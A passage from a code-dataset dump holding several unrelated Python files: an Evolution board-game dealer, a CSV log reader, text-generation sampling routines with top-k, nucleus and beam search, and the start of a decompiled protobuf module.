the API to progress though it.\n\n Attributes:\n players: List of each players' PlayerState\n deck: List of TraitCards representing the game's deck. Where the beginning\n of the list is the top of the deck, and the end of the list is the bottom.\n watering_hole: Integer representing the board's number of available food tokens.\n current_player_index: Index of player_sets for the player whose turn it is.\n skipped_players: List of players who are no longer feeding in the current round.\n \"\"\"\n\n def __init__(self, player_interfaces):\n \"\"\"\n create a Dealer object\n :param player_interfaces: list of player interface\n \"\"\"\n self.players = []\n self.deck = []\n self.watering_hole = 0\n self.current_player_index = 0\n self.skipped_players = []\n\n for index, player in enumerate(player_interfaces):\n self.players.append(PlayerState(player, index + 1))\n\n def __eq__(self, other):\n \"\"\"Compares two dealer objects\"\"\"\n return all([isinstance(other, Dealer),\n len(self.players) == len(other.players),\n self.deck == other.deck,\n self.watering_hole == other.watering_hole,\n self.current_player_index == other.current_player_index,\n self.wh_cards == other.wh_cards])\n\n def run(self):\n \"\"\"\n Runs a complete instance of the Evolution game.\n \"\"\"\n self.create_deck()\n while len(self.deck) > self.min_deck_size() and self.players:\n self.skipped_players = []\n self.make_initial_species()\n self.deal_round()\n self.players_start()\n actions = self.get_player_actions()\n self.validate_actions(actions)\n self.apply_actions(actions)\n self.reduce_species_pop()\n self.move_food()\n self.move_food()\n\n def create_deck(self):\n \"\"\"\n Creates a deck of TraitCards.\n Creates 7 cards of each Trait with a value of [-3,3] except for carnivore\n where there are 17 cards created with a value of [-8,8].\n \"\"\"\n for trait in TraitCard.traits:\n num_cards = 7\n if trait == \"carnivore\":\n num_cards = 17\n self.deck.extend(TraitCard.gen_cards(num_cards, trait))\n self.deck.sort(TraitCard.compare)\n\n def make_initial_species(self):\n \"\"\"\n Gives each player without a species board one new species with a\n population of one.\n \"\"\"\n for player in self.players:\n if len(player.species) == 0:\n player.species.append(Species())\n\n def min_deck_size(self):\n \"\"\"\n Determines the lowest amount of cards the deck can have while still\n being able to give each player the appropriate number of cards at the\n start of a round.\n :return: The number of cards required to deal at the start of a round.\n \"\"\"\n num_species = 0\n for player in self.players:\n num_species += len(player.species)\n min_cards = (3 * len(self.players)) + num_species\n return min_cards\n\n def deal_round(self):\n \"\"\"\n Gives each player one card per species board it owns and three additional\n cards.\n \"\"\"\n for player in self.players:\n num_cards = 3 + len(player.species)\n self.deal(num_cards, player)\n\n def players_start(self):\n \"\"\"\n Calls start on each player with the current amount of food in the WH.\n \"\"\"\n for player in self.players:\n player.start(self.watering_hole)\n\n def get_player_actions(self):\n \"\"\"\n Gets player actions for each player using the choose method.\n :return: List-of-Action, for each player in the game.\n \"\"\"\n actions = []\n before = []\n to_remove = []\n after = map(lambda plr: plr.species, self.players)\n for player in self.players:\n after = after[1:]\n choice = player.choose(before, after)\n if choice:\n actions.append(choice)\n else:\n to_remove.append(player)\n before.append(player.species)\n for player in to_remove:\n self.remove_player(player)\n return actions\n\n def validate_actions(self, actions):\n \"\"\"\n Ensures that the list of actions contains valid actions for each player\n in the game. Removes any players whose actions are not valid.\n Effect: removes players from the self.players whose actions are invalid.\n :param actions: The list of Actions containing the requested Action of\n each player.\n \"\"\"\n to_remove = []\n for i in range(len(self.players)):\n if not self.players[i].is_valid_action(actions[i]):\n to_remove.append(i)\n for i in to_remove:\n self.remove_player(self.players[i])\n remaining_actions = []\n for index, action in enumerate(actions):\n if index not in to_remove:\n remaining_actions.append(action)\n\n def remove_player(self, player):\n \"\"\"\n Removes the given player from the game permenantly.\n :param player: the player to remove from the game.\n \"\"\"\n self.players.remove(player)\n if self.current_player_index == len(self.players):\n self.current_player_index = 0\n\n def reduce_species_pop(self):\n \"\"\"\n Reduces each players species population to its food amount at the end of\n a round.\n \"\"\"\n for player in self.players:\n for species in player.species:\n to_kill = species.population - species.food\n for _ in range(to_kill):\n self.kill(player, species)\n\n def move_food(self):\n \"\"\"\n Moves all food tokens from each players species to their food_bags.\n \"\"\"\n for player in self.players:\n player.move_food_to_bag()\n\n def apply_actions(self, actions):\n \"\"\"\n Applies the given list of Actions and feeds the players' species until\n they cannot feed anymore.\n :param actions: List-of Action where action i corresponds with the action\n of the i'th player.\n \"\"\"\n self.reveal_cards(actions)\n self.trigger_auto_traits()\n\n for player, action in zip(self.players, actions):\n player.apply_action(action)\n\n self.move_fat_food()\n while self.watering_hole > 0 and len(self.players) != len(self.skipped_players):\n self.feed1()\n\n def reveal_cards(self, actions):\n \"\"\"\n Adds all food points from cards allocated for food in the given actions to\n the waterin' hole.\n :param actions: List of Actions to get the food card selections from.\n \"\"\"\n for action, player in zip(actions, self.players):\n food_card = player.hand[action.food_card]\n self.watering_hole += food_card.food_points\n food_card.used = True\n\n self.watering_hole = max(self.watering_hole, 0)\n\n def trigger_auto_traits(self):\n \"\"\"\n Automatically updates the population or body size of a species with the\n Fertile or Long Neck traits\n \"\"\"\n for player in self.players:\n player.trigger_fertile()\n for player in self.players:\n self.watering_hole = player.trigger_long_neck(self.watering_hole)\n\n def move_fat_food(self):\n \"\"\"\n Moves fat-food to normal food\n \"\"\"\n for player in self.players:\n player.trigger_fat_food()\n\n def feed1(self):\n \"\"\"\n Executes one step in the feeding cycle and updates the game state accordingly\n Effect: Feeds one species of the current player, potentially triggerring\n other feedings.\n \"\"\"\n current_player = self.players[self.current_player_index]\n if self.watering_hole <= 0:\n return\n\n if self.current_player_index in self.skipped_players or \\\n not current_player.can_feed(self.opponents()):\n self.skip_cur_player()\n self.rotate_players()\n return\n\n feeding = self.next_feed()\n\n if feeding and self.validate_feeding(feeding):\n feeding.apply(self)\n self.rotate_players()\n else:\n self.remove_player(current_player)\n\n def validate_feeding(self, feeding):\n \"\"\"\n Ensures that the given Feeding is valid to apply to the current player.\n :param feeding: The Feeding to validate.\n :return: True if it is a valid Feeding, else False.\n \"\"\"\n return feeding.validate(self)\n\n def rotate_players(self):\n \"\"\"\n Increments this dealer's current player index to the next player in the ordering.\n \"\"\"\n self.current_player_index = (self.current_player_index + 1) % len(self.players)\n\n def kill(self, player, species):\n \"\"\"\n Removes one population token from the given species. If that species\n goes extinct 2 cards are dealt to the player.\n :param player: The player whose species is being killed.\n :param species: The species who is being killed.\n \"\"\"\n extinct = player.kill(species)\n if extinct:\n self.deal(2, player)\n\n def skip_cur_player(self):\n \"\"\"\n Removes the current player from the player feeding order.\n \"\"\"\n if self.current_player_index not in self.skipped_players:\n self.skipped_players.append(self.current_player_index)\n\n def next_feed(self):\n \"\"\"\n Gets the next species to feed for the current player.\n :return: a Feeding, either decided automatically if only one choice\n is present, or by asking the current player\n \"\"\"\n auto_eat = self.auto_eat()\n if auto_eat is None:\n current_player = self.players[self.current_player_index]\n opponents = map(lambda plr: plr.public_state(), self.opponents())\n next_feeding = current_player.next_feeding(self.watering_hole, opponents)\n if next_feeding:\n return next_feeding\n else:\n self.remove_player(current_player)\n return False\n else:\n return auto_eat\n\n def auto_eat(self):\n \"\"\"\n Feeds a species when there is only one herbivore or one carnivore with\n one attackable species.\n :return: A Feeding, or None if a feeding choice cannot be automatic.\n \"\"\"\n cur_player_species = self.players[self.current_player_index].species\n\n hungry_herbivores = [species for species in cur_player_species\n if \"carnivore\" not in species.traits and species.can_eat()]\n hungry_carnivores = [species for species in cur_player_species\n if \"carnivore\" in species.traits and species.can_eat()]\n\n if len(hungry_herbivores) == 1 and len(hungry_carnivores) == 0:\n eater = hungry_herbivores[0]\n return self.herbivore_autoeat(eater, cur_player_species)\n\n if len(hungry_carnivores) == 1 and len(hungry_herbivores) == 0:\n eater = hungry_carnivores[0]\n return self.carnivore_autoeat(eater, cur_player_species)\n return None\n\n def herbivore_autoeat(self, eater, cur_player_species):\n \"\"\"\n Constructs a Feeding for the given eater.\n :param eater: The herbivore species to feed.\n :param cur_player_species: List of the current player's species.\n eater must be an element of this list.\n \"\"\"\n herbivore_index = cur_player_species.index(eater)\n if \"fat-tissue\" in eater.traits and eater.fat_storage < eater.body:\n max_food = eater.body - eater.fat_storage\n food_requested = min(self.watering_hole, max_food)\n return FatTissueFeeding(herbivore_index, food_requested)\n else:\n return HerbivoreFeeding(herbivore_index)\n\n def carnivore_autoeat(self, eater, cur_player_species):\n \"\"\"\n Constructs a Feeding for the given eater.\n :param eater: The carnivore species to feed.\n :param cur_player_species: List of the current player's species.\n eater must be an element of this list.\n \"\"\"\n carnivore_index = cur_player_species.index(eater)\n targets = carnivore_targets(eater, self.opponents())\n\n if len(targets) == 1:\n target_player = next(player for player in self.players\n if targets[0] in player.species)\n defender_index = target_player.species.index(targets[0])\n target_index = self.opponents().index(target_player)\n return CarnivoreFeeding(carnivore_index, target_index, defender_index)\n\n def feed_scavengers(self):\n \"\"\"\n Gives one food token to all species with the scavenger trait.\n \"\"\"\n for player in self.players:\n self.watering_hole = player.trigger_scavenging(self.watering_hole)\n\n def feed(self, player, species):\n \"\"\"\n Updates the watering hole after a players feeding has been applied.\n :param player: The player currently feeding.\n :param species: The species the player is feeding.\n \"\"\"\n self.watering_hole = player.feed(species, self.watering_hole)\n\n def deal(self, num_cards, player):\n \"\"\"\n Gives num_cards to the player from the deck.\n :param num_cards: The number of cards to deal to the player.\n :param player: The player receiving the cards.\n \"\"\"\n to_deal = min(num_cards, len(self.deck))\n for i in range(to_deal):\n card = self.deck.pop(0)\n player.hand.append(card)\n\n def check_for_hungries(self, list_of_species):\n \"\"\"\n Finds the hungry species in a players list of species\n :param list_of_species: The players list of species.\n :return: List of hungry species.\n \"\"\"\n hungries = []\n for species in list_of_species:\n if species.can_eat():\n hungries.append(species)\n return hungries\n\n def opponents(self):\n \"\"\"\n get the player states of all non-current player\n :return: a list of player states\n \"\"\"\n opponents = [plr for plr in self.players]\n opponents.pop(self.current_player_index)\n return opponents\n\n def get_scores(self):\n \"\"\"\n Creates a List of Lists of player id to the associated player's score.\n Score is calculated by the sum of the food in the food bag, the sum of the\n population of each of that player's species, and the sum of the number\n of trait cards on each of their species.\n :return: A dictionary [[id, score], ...] for each player left in the game.\n \"\"\"\n scores = []\n for player in self.players:\n score = player.food_bag\n for species in player.species:\n score += species.population\n score += len(species.traits)\n scores.append([player.name, score])\n return scores\n","sub_path":"14/evolution/dealer.py","file_name":"dealer.py","file_ext":"py","file_size_in_byte":15638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"568589337","text":"class Ceplog:\n CEPLOG_FILE = \"ceplog-demo.csv\"\n\n\n def __init__(self):\n pass\n\n def open_ceplog(self):\n with open(f'data/{Ceplog.CEPLOG_FILE}', \"r\") as file:\n for line in file:\n current_line = line.split(\";\")\n print(current_line)\n\n def test_logs(self, cepcid):\n with open(f'data/{Ceplog.CEPLOG_FILE}', \"r\") as file:\n file.readline()\n for line in file:\n current_line = line.split(\";\")\n cep = int(current_line[0])\n key = current_line[1]\n log = current_line[6]\n\n is_cep_right = 'Right' if cepcid.find_log(cep, key, log) else 'Wrong'\n\n print(f'{cep} is {is_cep_right}')\n\n def show_logs_by_key(self, key):\n with open(f'data/{Ceplog.CEPLOG_FILE}', \"r\") as file:\n file.readline()\n for line in file:\n current_line = line.split(\";\")\n if(key == current_line[1]):\n print(current_line[0])\n","sub_path":"ceplog.py","file_name":"ceplog.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"133772739","text":"from model.ops import mask_lengths\nimport re\nimport torch\nimport numpy as np\n\nfrom copy import deepcopy\n\ndef top_k_logits(logits, k):\n if k == 0:\n # no truncation\n return logits\n else:\n values, _ = torch.topk(logits, k=k)\n min_values = values[:, -1, None]\n return torch.where(\n logits < min_values,\n torch.ones_like(logits, dtype=logits.dtype) * -1e4,\n logits,\n )\n\n\ndef top_p_logits(logits, p):\n \"\"\"Nucleus sampling\"\"\"\n batch = logits.size(0)\n sorted_logits, _ = torch.sort(logits, descending=True, dim=-1)\n cumulative_probs = torch.cumsum(torch.softmax(sorted_logits, dim=-1), dim=-1)\n a = torch.arange(0,batch).to(logits.device)\n b = torch.max(torch.sum(cumulative_probs <= p, dim=-1) - 1, torch.Tensor([0]).long().to(logits.device))\n min_values = sorted_logits[a,b].to(logits.device)\n return torch.where(\n logits < min_values[:,None],\n torch.ones_like(logits) * -1e4,\n logits,\n )\n\n\ndef gathered_input(indexed):\n device = indexed.device\n # print(indexed.size())\n bs, l = indexed.size()\n lens = torch.LongTensor([l + 1] * bs).to(device)\n indexed = torch.cat([indexed, torch.LongTensor([0] * bs)[:, None].to(device)], 1)\n return bs, l, (indexed,lens)\n\n\ndef divided_input(indexed):\n device = indexed[0].device\n title, content, title_len, context_len = indexed\n bs, tl = title.size()\n content = content[:,-1:]\n _, cl = content.size()\n cls = torch.LongTensor([2] * bs).to(device)\n cind = torch.cat([content, torch.LongTensor([0] * bs)[:, None].to(device)], 1)\n return bs, cl, (title, cind, title_len, cls)\n\n\ndef structured_input(indexed):\n device = indexed[0].device\n txt, struct = indexed\n bs, tl = txt.size()\n l = torch.LongTensor([tl + 1] * bs).to(device)\n txt = torch.cat([txt, torch.LongTensor([0] * bs)[:, None].to(device)], 1)\n struct = torch.cat([struct, torch.LongTensor([0] * bs)[:, None].to(device)], 1)\n return bs, tl, (txt, struct, l)\n\n\ndef get_mem(model,inp):\n istuple = True if isinstance(inp, tuple) else False\n with torch.no_grad():\n if istuple:\n title, context, title_len, context_len = inp\n context = context[:,:-1]\n context_len = torch.clamp_min(context_len - 1,0)\n _, mem = model.compute_hidden((title,context,title_len,context_len,None))\n else:\n bs, l = inp.size()\n lens = torch.LongTensor([l - 1] * bs).to(inp.device)\n _, mem = model.compute_hidden((inp[:,:-1],None,lens))\n\n return mem, inp\n\n\ndef sample(model, lengths, inp, top_w, temparature, experimental_loss, sampling_mode=0):\n top_whatever = top_k_logits if isinstance(top_w, int) else top_p_logits\n probs = None\n istuple = True if isinstance(inp, tuple) else False\n mem, inp = get_mem(model, inp)\n res = torch.LongTensor([]).to(inp.device)\n cnt = 0\n for _ in range(lengths):\n cnt+=1\n with torch.no_grad():\n if istuple:\n bs, l, inp = divided_input(inp)\n else:\n bs, l, inp = gathered_input(inp[:,-1:])\n if experimental_loss:\n logits, new_mem = model.sampling(inp + (mem, sampling_mode, top_w, temparature))\n else:\n logits, new_mem = model(inp + (None, mem))\n # mem = [torch.cat([mem[i], new_mem[i].to(mem[i].dtype)[:,:-1]],1) for i in range(len(mem))]\n mem = tuple([new_mem[i][...,:-1,:] for i in range(len(mem))])\n logits = top_whatever(logits, top_w)\n logits = logits.view(bs,l,-1)\n logits = logits[:,-1,:] / temparature\n saved_logits = logits\n sampled = torch.multinomial(torch.softmax(logits,-1),1)\n res = torch.cat([res,sampled],1)\n temp_probs = torch.softmax(saved_logits, 1)\n probs = torch.cat([probs,temp_probs[torch.arange(len(sampled)),sampled.squeeze(1)][:,None]],1) \\\n if probs is not None else temp_probs[torch.arange(len(sampled)),sampled.squeeze(1)][:,None]\n if istuple:\n title, cind, tls, cls = inp\n cind = sampled\n inp = (title, cind,tls,cls)\n else:\n inp = sampled\n # if sampled == torch.LongTensor([[0]]).to('cuda'):\n # cnt +=1\n # if cnt ==2:\n # break\n if istuple:\n return res.tolist(), probs.tolist()\n else:\n return res.tolist(), probs.tolist()\n\n\ndef sample_char(model, lengths, inp, top_w, temparature, experimental_loss, encoder, sampling_mode=0):\n top_whatever = top_k_logits if isinstance(top_w, int) else top_p_logits\n\n vocab_size=encoder.vocab_size\n\n vocab_length=[ count_syllable(encoder.decode([i]).strip()) for i in range(vocab_size-1) ]\n vocab_length.append(0)\n vocab_length=torch.LongTensor(vocab_length).to(next(model.parameters()).device)\n\n sorted_garbage=vocab_length==0\n sample_k=3\n enter_index=0\n sorted_garbage[enter_index]=False\n\n # print(sorted_garbage)\n enter = torch.LongTensor([[enter_index]]).to(next(model.parameters()).device)\n\n def test_conj_end(model,inp,mem):\n\n if istuple:\n bs, l, inp = divided_input(inp[:, -1:])\n else:\n bs, l, inp = gathered_input(inp[:, -1:])\n\n if experimental_loss:\n logits, new_mem = model.sampling(inp + (mem, sampling_mode, top_w, temparature))\n else:\n logits, new_mem = model(inp + (None, mem))\n\n # print(logits[:,0])\n logits[:, sorted_garbage] = -1e3\n # print(logits[:,0])\n logits = top_whatever(logits, k=top_w)\n _, top_indexes=torch.topk(logits,sample_k,-1)\n\n res = set([enter_index]).issubset(set(top_indexes[0].tolist()))\n # if res:\n # print(top_indexes)\n return res\n\n istuple = True if isinstance(inp, tuple) else False\n token_length_holder = []\n test_batch=inp\n final_result=[]\n\n for batch in test_batch:\n inp=batch.view(1,-1)\n # inp = torch.cat([inp, enter], -1)\n res = inp\n text_idx=inp.tolist()[0]\n # text_idx=rollback_idx(text_idx,inv_dic)\n text=encoder.decode(text_idx)\n\n original_length = len(text.replace(\" \", \"\"))\n token_length=[]\n current_length=original_length\n mem, _ = get_mem(model, inp)\n\n for i, cll in enumerate(lengths):\n\n object_length=original_length+sum(lengths[:i+1])\n\n # copy variable for roll-back condition\n init_res = deepcopy(res)\n init_inp = deepcopy(inp)\n\n while current_length < object_length:\n # print(current_length,object_length)\n with torch.no_grad():\n if istuple:\n bs, l, inp = divided_input(inp[:, -1:])\n else:\n bs, l, inp = gathered_input(inp[:, -1:])\n if experimental_loss:\n logits, new_mem = model.sampling(inp + (mem, sampling_mode, top_w, temparature))\n else:\n logits, new_mem = model(inp + (None, mem))\n\n logits = logits.view(bs, l, -1)\n\n logits = logits[:, -1, :] / temparature\n\n logits=remove_over_length(logits,vocab_length,object_length-current_length)\n\n # logits[:,sorted_garbage]=-1e4\n logits[:,enter_index]=-1e4\n logits[:,12]=-1e4\n\n logits = top_k_logits(logits, k=top_w)\n\n sampled = torch.multinomial(torch.softmax(logits, -1), 1)\n\n pas = encoder.decode(sampled[0].tolist())\n inp = sampled\n mem = tuple([new_mem[i][..., :-1, :] for i in range(len(mem))])\n # mem = [torch.cat([mem[i], new_mem[i][:, :-1]], 1) for i in range(len(mem))]\n\n # test if must roll-back to initial step of one line.\n if current_length+count_syllable(pas.strip())==object_length-1 or (current_length+count_syllable(pas.strip())==object_length \\\n and not test_conj_end(model,inp,mem)):\n\n # roll back variable to initial state\n mem, _ = get_mem(model,init_inp)\n res = deepcopy(init_res)\n inp = deepcopy(init_inp)\n current_length = original_length + sum(lengths[:i])\n else:\n current_length += vocab_length[sampled[0].tolist()[0]].item()\n # current_length += count_syllable(pas.strip())\n res=torch.cat([res,sampled],1)\n # pas = pas.replace(\" \", \"\")\n # pas = re.sub(r'.', '\\n', pas)\n\n # print(current_length)\n # print(pas)\n # print(count_syllable(pas.strip()))\n # add mem to enter latent space\n # print(pas)\n res=torch.cat([res,enter],-1)\n inp=res\n mem, _ = get_mem(model, inp)\n\n token_length_holder.append(token_length)\n final_result.extend(res.tolist())\n if istuple:\n return inp[1].tolist()\n else:\n return res.tolist()\n\n\ndef block_words(generated, ngram):\n target = ' '.join(map(str,generated[-ngram+1:]))\n temp = ' '.join(map(str, generated))\n blocked = re.findall('(?<={} )\\d+'.format(target), temp)\n return [int(i) for i in blocked]\n#\n# def index_text(encoder, text, dic):\n# indexed = encoder.encode(text)\n# indexed = convert_idx_list(indexed, dic)\n# indexed = torch.Tensor(indexed).long()[None]\n# return indexed\n\n\ndef beam_sample(model, lengths, inp, beam_size, temparature, experimental_loss, sampling_mode=0, block_ngram=4):\n # def block(logits, res, ngram=4):\n # \"\"\"\n # :param logits: Tensor [batch, beam, vocab_size]\n # :param res: Tensor [batch, beam, len]\n # :param ngram: int\n # :return:\n # \"\"\"\n # for batch, batch_logit in zip(res, logits):\n # for beam, logit in zip(batch, batch_logit):\n # generated = list(beam.to('cpu').numpy())\n # blocked = block_words(generated,ngram)\n # logit[blocked] = -6e4\n # return logits\n\n def beam_start(logits, probs, mem, res):\n s = mem[0].size()[1:]\n logits = logits[:, -1, :] / temparature\n p, i = torch.topk(torch.log_softmax(logits, -1), beam_size, -1) #[batch, beam_size]\n probs = probs + p\n res = torch.cat([res[:,None].repeat(1,beam_size,1), i[...,None]],2) #[batch, beam, l]\n return probs, i.view(-1)[:,None], [i[:,None].repeat(1,beam_size,1,1).view((-1,)+s) for i in mem], res\n\n def beam_continue(logits, probs, mem, res):\n logits = logits[:, -1, :] / temparature\n logits = logits.view(bs, beam_size, -1)\n # logits = block(logits,res,block_ngram)\n p, i = torch.topk(torch.log_softmax(logits, -1), beam_size, -1) # [batch_size, beam_size, beam_size]\n probs = probs.unsqueeze(-1) + p\n new_probs = probs.view(bs, -1)\n probs, ni = new_probs.topk(beam_size, -1)\n sampled = i.view(bs, -1).gather(1, ni) #[batch, beam]\n group = ni // beam_size\n ind = torch.arange(bs)[:, None], group\n res = res[ind]\n res = torch.cat([res, sampled[..., None]], 2)\n lh = mem[0].size()[1:]\n reshaped_mem = [i.view((bs,beam_size) + lh) for i in mem]\n mem = [i[ind].view((-1,)+lh) for i in reshaped_mem]\n return probs, sampled.view(-1)[:,None], mem, res\n\n def finalize(probs, res):\n _, ind = probs.topk(1,-1)\n return res[torch.arange(bs),ind.squeeze(-1)]\n\n istuple = True if isinstance(inp, tuple) else False\n mem, inp = get_mem(model, inp)\n bs = inp.size(0)\n res = inp\n cnt = 0\n probs = torch.zeros((inp.size(0),beam_size), dtype=inp.dtype,device=inp.device)\n for _ in range(lengths):\n cnt+=1\n with torch.no_grad():\n if istuple:\n ts, l, inp = divided_input(inp)\n else:\n ts, l, inp = gathered_input(inp[:,-1:])\n if experimental_loss:\n logits, new_mem = model.sampling(inp + (mem, sampling_mode, beam_size, temparature))\n else:\n logits, new_mem = model(inp + (None, mem))\n mem = [torch.cat([mem[i], new_mem[i].to(mem[i].dtype)[:,:-1]],1) for i in range(len(mem))]\n logits = logits.view(ts,l,-1)\n if cnt ==1:\n probs, sampled, mem, res = beam_start(logits,probs,mem, res)\n else:\n probs, sampled, mem, res = beam_continue(logits, probs, mem, res)\n if istuple:\n title, cind, tls, cls = inp\n cind = sampled\n inp = (title, cind,tls,cls)\n else:\n inp = sampled\n\n res = finalize(probs, res)\n if istuple:\n return res.tolist(), _\n else:\n return res.tolist(), _\n\n\ndef compute_prob(encoder_path, model, texts, experimental_loss):\n enc = get_encoder(encoder_path)\n texts = index_text(enc,texts,experimental_loss).to(next(model.parameters()).device)\n probs = []\n with torch.no_grad():\n for i in range(len(texts[0]) - 1):\n batch_text = texts[:, :i+1]\n target_word = texts[:, i+1]\n lens = torch.Tensor([i + 2]).long().to(batch_text.device)\n inp_mask = mask_lengths(lens, reverse=True).byte().to(batch_text.device)\n if experimental_loss:\n logits = model.sampling(torch.cat([batch_text, torch.Tensor([0])[:, None].long().to(batch_text.device)], 1),\n None, inp_mask, True)\n else:\n logits = model(torch.cat([batch_text, torch.Tensor([0])[:, None].long().to(batch_text.device)], 1), None, inp_mask,\n None)\n logits = logits[0] # [vocab_size]\n prob = torch.softmax(logits,0)\n probs.append(prob[target_word[0]].item())\n print(probs)\n\n\ndef sample_hook(model, lengths, inp, top_k, top_p, temparature, experimental_loss, hard_sample, is_hard,\n line_idx, check_line, add_indices):\n probs = None\n istuple = True if isinstance(inp, tuple) else False\n line_num = torch.sum(inp ==0)\n for _ in range(lengths):\n with torch.no_grad():\n if istuple:\n bs, l, inp = divided_input(inp)\n else:\n bs, l, inp = gathered_input(inp)\n if experimental_loss:\n logits, __ = model.sampling(inp + (None, is_hard, hard_sample))\n else:\n logits, __ = model(inp + (None, None))\n logits = logits.view(bs,l,-1)\n logits = logits[:,-1,:] / temparature\n saved_logits = logits\n logits = top_k_logits(logits, k=top_k)\n # logits = top_p_logits(logits, p=top_p)\n sampled = torch.multinomial(torch.softmax(logits,-1),1)\n if sampled == line_idx:\n line_num+=1\n if not line_num % check_line and line_num // check_line >0:\n sampled = torch.cat([sampled, add_indices],1)\n # print(_, sampled.size())\n # temp_probs = torch.softmax(saved_logits, 1)\n # probs = torch.cat([probs,temp_probs[torch.arange(len(sampled)),sampled.squeeze(1)][:,None]],1) \\\n # if probs is not None else temp_probs[torch.arange(len(sampled)),sampled.squeeze(1)][:,None]\n if istuple:\n title, cind, tls, cls = inp\n cind = torch.cat([cind[:,:-1], sampled], -1)\n inp = (title, cind)\n else:\n indexed,lens = inp\n inp = torch.cat([indexed[:,:-1], sampled], -1)\n if istuple:\n return inp[1].tolist(), _\n else:\n return inp.tolist(), _\n\ndef remove_over_length(logits,vocab_length_tensor,length):\n return torch.where(\n vocab_length_tensor > length,\n torch.ones_like(logits, dtype=logits.dtype) * -1e4,\n logits,\n )\n\ndef english_syllable_count(word):\n return len(\n re.findall('(?!e$)[aeiouy]+', word, re.I) +\n re.findall('^[^aeiouy]*e$', word, re.I)\n )\n\n\n\n\ndef count_syllable(word):\n cnt=0\n # print(bool(re.search(\"[ㄱ-ㅎ|ㅏ-ㅣ|가-힣]\", word)))\n # print(word)\n # print(bool(re.search(\"[ㄱ-ㅎㅏ-ㅣ가-힣]\", word)))\n if bool(re.search(\"[ㄱ-ㅎㅏ-ㅣ가-힣]\", word)):\n for i,w in enumerate(word):\n if bool(re.search(\"[ㄱ-ㅎㅏ-ㅣ가-힣]\",w)):\n cnt+=1\n else:\n cnt = english_syllable_count(word)\n # print(cnt)\n return cnt\n\n\ndef structured_sample(model, lengths, inp, top_w, temparature, experimental_loss, sampling_mode=0):\n model.eval()\n top_whatever = top_k_logits if isinstance(top_w, int) else top_p_logits\n cnt = 0\n gen_txt, gen_st = inp\n for _ in range(lengths):\n cnt+=1\n with torch.no_grad():\n inp = gen_txt, gen_st\n bs, l, inp = structured_input(inp)\n if experimental_loss:\n logits, target_st, new_txt_mem, new_st_mem = model.sampling(inp + (None, None, sampling_mode, top_w, temparature))\n else:\n logits, new_mem = model(inp + (None, None))\n # txt_mem = [torch.cat([txt_mem[i], new_txt_mem[i].to(txt_mem[i].dtype)[:,:-1]],1) for i in range(len(txt_mem))]\n # st_mem = [torch.cat([st_mem[i], new_st_mem[i].to(st_mem[i].dtype)[:,:-1]],1) for i in range(len(st_mem))]\n logits = top_whatever(logits, top_w)\n logits = logits.view(bs,l,-1)\n logits = logits[:,-1,:] / temparature\n sampled = torch.multinomial(torch.softmax(logits,-1),1)\n\n target_st = target_st.view(bs,l,-1)\n target_st = target_st[:,-1] / temparature\n sampled_st = torch.multinomial(torch.softmax(target_st.to(torch.float32),-1),1)\n\n gen_txt = torch.cat([gen_txt,sampled],1)\n gen_st = torch.cat([gen_st,sampled_st],1)\n return gen_txt.tolist(), gen_st.tolist()\n","sub_path":"util/sampling.py","file_name":"sampling.py","file_ext":"py","file_size_in_byte":18251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"375185358","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/svpino/dev/tensorflow-object-detection-sagemaker/todl/tensorflow-object-detection/research/object_detection/protos/matcher_pb2.py\n# Compiled at: 2020-04-05 21:16:38\n# Size of source mod 2**32: 3868 bytes\nimport google.protobuf as _descriptor\nimport google.protobuf as _message\nimport google.protobuf as _reflection\nimport google.protobuf as _symbol_database\n_sym_db = _symbol_database.Default()\nimport object_detection.protos as object__detection_dot_protos_dot_argmax__matcher__pb2\nimport object_detection.protos as object__detection_dot_protos_dot_bipartite__matcher__pb2\nDESCRIPTOR = _descriptor.FileDescriptor(name='object_detection/protos/matcher.proto',\n package='object_detection.protos',\n syntax='proto2',\n serialized_options=None,\n serialized_pb=b'\\n%object_detection/protos/matcher.proto\\x12\\x17object_detection.protos\\x1a,object_detection/protos/argmax_matcher.proto\\x1a/object_detection/protos/bipartite_matcher.proto\"\\xa4\\x01\\n\\x07Matcher\\x12@\\n\\x0eargmax_matcher\\x18\\x01 \\x01(\\x0b2&.object_detection.protos.ArgMaxMatcherH\\x00\\x12F\\n\\x11bipartite_matcher\\x18\\x02 \\x01(\\x0b2).object_detection.protos.BipartiteMatcherH\\x00B\\x0f\\n\\rmatcher_oneof',\n dependencies=[\n object__detection_dot_protos_dot_argmax__matcher__pb2.DESCRIPTOR, object__detection_dot_protos_dot_bipartite__matcher__pb2.DESCRIPTOR])\n_MATCHER = _descriptor.Descriptor(name='Matcher',\n full_name='object_detection.protos.Matcher',\n filename=None,\n file=DESCRIPTOR,\n containing_type=None,\n fields=[\n _descriptor.FieldDescriptor(name='argmax_matcher',\n full_name='object_detection.protos.Matcher.argmax_matcher',\n index=0,\n number=1,\n type=11,\n cpp_type=10,\n label=1,\n has_default_value=False,\n default_value=None,\n message_type=None,\n enum_type=None,\n containing_type=None,\n is_extension=False,\n extension_scope=None,\n serialized_options=None,\n file=DESCRIPTOR),\n _descriptor.FieldDescriptor(name='bipartite_matcher',\n full_name='object_detection.protos.Matcher.bipartite_matcher',\n index=1,\n number=2,\n type=11,\n cpp_type=10,\n label=1,\n has_default_value=False,\n default_value=None,\n message_type=None,\n enum_type=None,\n containing_type=None,\n is_extension=False,\n extension_scope=None,\n serialized_options=None,\n file=DESCRIPTOR)],\n extensions=[],\n nested_types=[],\n enum_types=[],\n serialized_options=None,\n is_extendable=False,\n syntax='proto2',\n extension_ranges=[],\n oneofs=[\n _descriptor.OneofDescriptor(name='matcher_oneof',\n full_name='object_detection.protos.Matcher.matcher_oneof',\n index=0,\n containing_type=None,\n fields=[])],\n serialized_start=162,\n serialized_end=326)\n_MATCHER.fields_by_name['argmax_matcher'].message_type = object__detection_dot_protos_dot_argmax__matcher__pb2._ARGMAXMATCHER\n_MATCHER.fields_by_name['bipartite_matcher'].message_type = 